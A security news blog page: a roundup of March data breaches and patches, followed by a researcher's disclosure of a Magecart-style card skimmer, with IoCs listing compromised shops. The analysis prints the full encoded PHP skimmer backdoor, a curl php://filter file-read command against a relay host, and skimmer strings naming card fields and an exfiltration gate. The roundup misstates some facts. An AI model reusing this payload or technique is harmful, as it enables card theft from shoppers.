International hotel chain Marriot reported 5.2 million guest details were stolen after an unnamed app used by guests was hacked. According to Marriots online breach notification, stolen data included guest name, address, email address, phone number, loyalty account number and point balances, employer, gender, birthdays (day and month only), airline loyalty program information, and hotel preferences. It was only on 30th November 2018 Marriott disclosed a breach of 383 million guestsTony Pepper, CEO at Egress said “Marriott International admitted that it has suffered another data breach, affecting up to 5.2 million people. This follows the well-documented data breach highlighted in November 2018 where the records of approximately 339 million guests were exposed in a catastrophic cybersecurity incident. Having already received an intention to fine from the ICO to the tune of £99m for that, Marriott will be more than aware of its responsibility to ensure that the information it shares and stores is appropriately protected. Not only does this news raise further concerns for Marriott, but it also serves as a reminder to all organisations that they must constantly be working to enhance their data security systems and protocols to avoid similar breaches. It will be interesting to see if further action is taken by the ICO”

Five billion records were found to be exposed by UK security company Elasticsearch.  Researchers also found an Amazon Web Services open MongoDB database of eight million European Union citizen retail sales records was left exposed, which included personal and financial information.  And Let’s Encrypt revoked over 3 million TLS certificates due to a bug which certification rechecking

March was another busy month for security updates, patch Tuesday saw Microsoft release fixes for 116 vulnerabilities and there was an out-of-band Microsoft fix for 'EternallDarkness' bug on 10th March, but a zero-day exploited vulnerability in Windows remained unpatched by the Seattle based software giants.  Adobe released a raft of security patches, as did Apple (over 30 patches), Google, Cisco, DrayTek, VMware, and Drupal.

Stay safe, safe home and watch for the scams.

BLOG
NEWS
    VULNERABILITIES AND SECURITY UPDATES
      AWARENESS, EDUCATION AND THREAT INTELLIGENCE

      Uncovering New Magecart Implant Attacking eCommerce

      If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

      Disclaimer

      National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

      Analysis

      Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

      Fig1: External Connection outside the eCommerce Perimeter

      From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

      touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

      The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

      curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

      The result follows:

      PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

      We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed (eval).

      Fig2: Payload Stage 1

      By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

      Fig3: Payload Stage 3

      Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section would help us to understand the execution chain.

      REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;
      

      We actually have one more host that need to be analyzed. By taking a closer look to the used domain, we might agree that it looks like the ending proxy gate which stores data on a given database (mongodb). Again by enumerating and seeking inside its public information it was actually possible to spot and to enumerate the used technology to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker infrastructure – I was able to build up a simple monitoring script which revealed the most used compromised eCommerce.

      Attack Magnitude

      From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain since many eCommerces could have a low selling rate (rate of customers during my monitoring phase). In this case even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking, converting and importing temporary files generated every time a data leak happens (every time a user adds his credit card). So we might ending up with another method. Fortunately the host reserved a PTR (Pointer Record) to mo-------.]fvds].ru as shown on Fig4.

      Fig4: PTR on ^^^^^^.su

      The new host (mo-------) definitely recall the mag^^^^^^.]su registered email address (mo------@protonmail.]com) in an unique way. BTW It is active since 2019-07!!

      Fig5: registered eMail Address

      According to URLSCAN, using the PTR record in order to understand how many known websites have links pointing to mo-----.]fvds.]ru, you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce. Now, I am not saying that every single eCommerce in the list has been compromised, but taking randomly 3 of them (and reported in IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (so that points to the command and control) should be checked.

      Fig6: Link on m——–fvds.]ru

      According to urlscan.io most of the websites pointing to momo--------s.]ru respect the following geographic distribution (Fig7). Most of all are US based followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, stats (Fig7) are surprisingly talkative.

      Fig7: Location of Possible Compromised eCommerce

      IoC

      The following IoC have been extracted from Command and Control as described in the Analysis section. I do have evidences that those eCommerce send credit card numbers to magesouce but I did not analysed every single eCommerce outside the “High Confidentially”, which could be compromised using different infection chains. More potentially compromised eCommerce site could be found, a nice unverified list (“Low Confidentially”) follows.

      High Confidentiality Compromised :

      – (POST): https://*****/js/ar/ar2497.php
      – Sha256 (ar2497.php): 7a04ef8eba6e72e3e21ba9da5e1ac99e4f9022fae19dc9c794d87e4aadba1db4
      – mom*****@protonmail.]com (email used to register c2)
      – ——.]com (rely)
      https://^^^^^^^^^.]su/gate/proxy (c2)
      – mom*****.]fvds].ru (PTR)
      http://www.]startinglineproducts.]com
      – shop.sobelathome.]com
      – shop.princessluxurybed.]com
      http://www.nclhome.]com
      http://www.shoprednose.]com.]au
      http://www.plusmedical.]com.]au
      http://www.selariadias.]com.]br
      – owners.clubwyndhamstore.]com
      http://www.assokappa.]it
      http://www.shogunlivraria.]com.]br
      http://www.broadtickets.]com
      http://www.broadticket.]com
      http://www.siamflorist.]com
      http://www.castmemberlinen.]com
      – bumperworksonline.]com
      http://www.stixx.]com.]br
      http://www.worldmarkbywyndhamstore.]com
      – tknwthunderdome.]com
      http://www.silknaturals.]com

      Low Confidentiality Compromised (more investigation is needed):
      URL: https://mo——.]fvds.]ru/
      URL: http://hotelcathedrale.]be/
      URL: https://mag^^^^^^^^.]su/
      URL: http://www.]americanlighter.]com/
      URL: http://www.]turyagatea.]com/
      URL: http://www.]dysin.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/
      URL: http://demolicaomoveis.]com.]br/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: https://www.]chirobuddy.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://flagandsymbol.]com/
      URL: http://english-furniture.]co.]uk/
      URL: https://shop.]horoskoper.]net/
      URL: https://myphonetics.]com/
      URL: https://magesource.]su/saturn/login
      URL: http://hotelcathedrale.]be/
      URL: http://www.]almosauto.]in/
      URL: http://chappalwalla.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]doreall.]com/
      URL: https://prawnman.]com.]au/
      URL: http://www.]autocleaningbrunssum.]nl/
      URL: https://www.]paudicesrl.]it/
      URL: http://www.]pejenterprisesinc.]com/
      URL: http://luxuryjewelleryto.]com/
      URL: http://okj.]in/
      URL: http://hotelcathedrale.]be/
      URL: http://aquasport.]sigmacell.]in/
      URL: https://www.]xinginroo.]com/
      URL: http://dhyanaa.]com/
      URL: http://hotelcathedrale.]be/
